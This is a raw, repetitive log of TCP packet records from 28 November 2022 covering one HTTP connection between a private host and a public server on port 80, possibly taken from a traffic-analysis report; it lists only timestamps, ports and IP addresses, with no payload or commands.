Nov 28, 2022 12:46:58.040803909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040813923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040827036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040842056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040853024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040864944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040882111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040894985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040931940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040937901 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.040944099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040955067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040966988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040978909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.040990114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041002035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041013956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041018963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041026115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041037083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041049004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041060925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041073084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041084051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041095972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041107893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041126966 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041186094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041198015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041209936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041220903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041233063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041244984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041255951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041268110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041280031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041291952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041297913 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041388035 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041438103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041450977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041461945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041475058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041487932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041500092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041512012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041523933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041537046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041548967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041559935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041572094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041584015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041599989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041613102 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041616917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041630030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041666985 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041692972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041704893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041717052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041733027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041735888 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041743994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041754007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041769028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041783094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041794062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041805029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041817904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041830063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041840076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041851044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041862011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041872978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041882992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041893959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041944027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041945934 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.041954994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041965961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041976929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.041986942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042000055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042013884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042025089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042036057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042046070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042057037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042068005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042078018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042078972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042088985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042099953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042202950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042215109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042224884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042238951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042251110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042253017 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042263031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042273998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042288065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042299986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042311907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042315960 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042323112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042335033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042346954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042357922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042370081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042381048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042392969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042433023 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042453051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042465925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042479992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042491913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042503119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042515039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042526007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042537928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042555094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042567968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042579889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042584896 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042593002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042608976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042692900 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042705059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042716980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042728901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042741060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042752028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042763948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042776108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042787075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042798996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042810917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042821884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042835951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042848110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042860031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042871952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042927027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.042954922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042967081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042979002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.042990923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043001890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043014050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043025970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043042898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043050051 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043055058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043066978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043080091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043095112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043107986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043210983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043224096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043235064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043246984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043257952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043268919 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043270111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043281078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043292999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043303967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043315887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043329954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043342113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043349981 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043354034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043365955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043378115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043389082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043401003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043411970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043423891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043464899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043478012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043488979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043503046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043519020 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043530941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043541908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043548107 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043555975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043567896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043580055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043591022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043596029 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043605089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043617010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043628931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043692112 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043719053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043731928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043742895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043755054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043766022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043777943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043791056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043802977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043814898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043826103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043837070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043848991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043860912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043899059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.043976068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.043989897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044017076 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044025898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044039011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044064045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044078112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044089079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044101000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044112921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044123888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044136047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044147015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044158936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044169903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044182062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044193029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044204950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044217110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044228077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044231892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044239998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044253111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044265985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044277906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044286013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044289112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044301033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044338942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044351101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044353962 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044362068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044373989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044384956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044395924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044406891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044418097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044430017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044446945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044461012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044472933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044487000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044502974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044513941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044538975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044553041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044564009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044575930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044583082 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044588089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044599056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044610977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044622898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044635057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044646025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044657946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044670105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044672966 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044681072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044692993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044704914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044715881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044729948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044744015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044754982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044764996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044775963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044785976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044796944 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044807911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044817924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044828892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044831991 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044842005 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044852972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044862986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044873953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044884920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044897079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044913054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.044961929 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.044989109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045001030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045011997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045022011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045032978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045043945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045054913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045066118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045078993 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045082092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045094013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045104980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045116901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045241117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045249939 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045252085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045263052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045274019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045284986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045295954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045306921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045320034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045330048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045341015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045347929 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045350075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045361042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045371056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045382023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045392990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045403957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045414925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045424938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045435905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045447111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045456886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045469046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045480013 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.045496941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045509100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045520067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045531034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045542002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045552015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045562983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045573950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045584917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045594931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.045605898 CET	80	49836	172.67.203.65	192.168.11.20
